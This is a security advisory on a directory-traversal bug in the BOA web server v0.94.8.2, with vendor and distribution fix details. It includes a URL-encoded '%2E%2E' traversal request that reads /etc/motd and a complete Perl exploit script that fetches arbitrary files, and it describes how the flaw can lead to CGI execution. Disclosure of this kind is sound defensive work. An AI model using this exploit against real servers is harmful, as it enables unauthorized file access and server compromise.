Vulnerability

    BOA

Affected

    BOA web server v0.94.8.2

Description

    Following is based on a S21SEC-005-en Security Advisory by llmora.
    There is a security bug  in BOA v0.94.8.2 that allows  a malicious
    user to access files outside  the document root of the  web server
    as the user the server runs as.

    Boa is an open source  high performance web server for  Unix-alike
    computers (http://www.boa.org). It  does file serving  and dynamic
    content generation via CGI.

    The boa web  server suffers of  the well-known "../.."  web server
    problem.  If we request a document from the web server, using  the
    "../.." technique, we get:

        homer:~$ telnet ilf 80
        Escape character is '^]'.
        GET /../../../../../../../../../../../etc/motd HTTP/1.0

        HTTP/1.0 404 Not Found

        <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY><H1>404 Not Found</H1>
        The requested URL /etc/motd was not found on this server.
        </BODY></HTML>
        Connection closed by foreign host.
        homer:~$

    So apparently  it doesn't  work, as  boa checks  for "/.."  in the
    path.   By URL-encoding  the "."  in the  request, we  are able to
    skip the ".." test, allowing us to access the contents of any file
    the user running the web server has access to:

        homer:~$ telnet ilf 80
        GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd HTTP/1.0

        HTTP/1.0 200 OK

        [... the /etc/motd file content is shown]

        Connection closed by foreign host.
        homer:~$

    If the administrator  enables extension based  CGI support with  a
    line like this in the boa.conf file:

        AddType application/x-httpd-cgi cgi

    then a request for a file  ending in .cgi will result in  the file
    being executed with the privileges of the user id running the  web
    server.  This file can be placed in any folder throughout the file
    system, not strictly under the DocumentRoot, and be accessed using
    the previous bug, leading to the web server account compromise.

    This bug has been tested  and verified to be present  in v0.94.8.2
    of the boa  web server.   Version 0.92 of  boa is not  affected by
    this problem.

    teleh0r  wrote  a  simple  exploit  for  the vulnerability.  It is
    tested on Boa version 0.94.7 which he believes is distributed with
    Debian.

    #!/usr/bin/perl -w

    ## Boa Web Server Daemon Exploit / Found by Lluis Mora
    ##
    ## Exploit written by teleh0r based on an advisory
    ## by Lluis Mora / llmora@s21sec.com / S21SEC
    ## (http://www.s21sec.com/en/avisos/s21sec-005-en.txt)
    ##
    ## This exploit will show the content of any file
    ## which is readable by the boa http daemon. Should
    ## work on Boa Web Servers below version v0.94.8.3
    ## but only til v0.92.x (See advisory for details)
    ##
    ## http://teleh0r.cjb.net/ || teleh0r@doglover.com

    use Socket; use strict;

    if (@ARGV < 2) {
        print("Usage: $0 <host> <file>\n");
        exit(1);
    }

    my ($host, $file, $url_encoded, $exploit_string,
        $iaddr, $paddr, $proto, $response);

    ($host, $file) = @ARGV;

    $file =~ s/(\w)/sprintf("%%%x",ord($1))/ge;

    # Make the below string long to be on the safe side!
    # ("/%2E%2E/" eq "/../" (URL-encoded.)); ;)

    $url_encoded = "/%2E%2E/"x"15";
    $exploit_string = "GET $url_encoded$file HTTP/1.0\015\012";

    $iaddr = inet_aton($host)                    || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
    $proto = getprotobyname('tcp')               || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    send(SOCKET,"$exploit_string\015\012", 0)    || die("Error: $!\n");

    while (defined($response = <SOCKET>)) {
        print("$response");
    }
    close(SOCKET); exit(1);

Solution

    The boa development team  has released v0.94.8.3 which  fixes this
    vulnerability.  Upgrades are available at the vendor website.

    This bug was closed in Debian (woody AND potato, i.e. unstable AND
    stable) on October 7th.   (Actual upload was made on  October 5th)
    Package maintainer for debian package  of boa is a boa  developer,
    so not much lag time.

        http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=74231

    This problem is fixed in version 0.94.8.3-1, uploaded to  Debian's
    unstable distribution on October 3, 2000.  Fixed packages are also
    available in  proposed-updates and  will be  included in  the next
    revision of Debian/2.2 (potato).

    Slink contains  Boa version  0.93.15.   This version  is no longer
    supported; they recommend that  slink users upgrade to  potato, or
    recompile the current Boa packages on their slink systems.

    Linux-Mandrake started shipping the  boa web server with  7.2 beta
    which uses the fixed  0.94.8.3 version.  Linux-Mandrake  users who
    have  installed  this  package  on  their  own  are  encouraged to
    upgrade to the version found in 7.2 beta or cooker.

    For FreeBSD:

        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/boa-0.94.8.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/boa-0.94.8.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/boa-0.94.8.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/boa-0.94.8.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/boa-0.94.8.3.tgz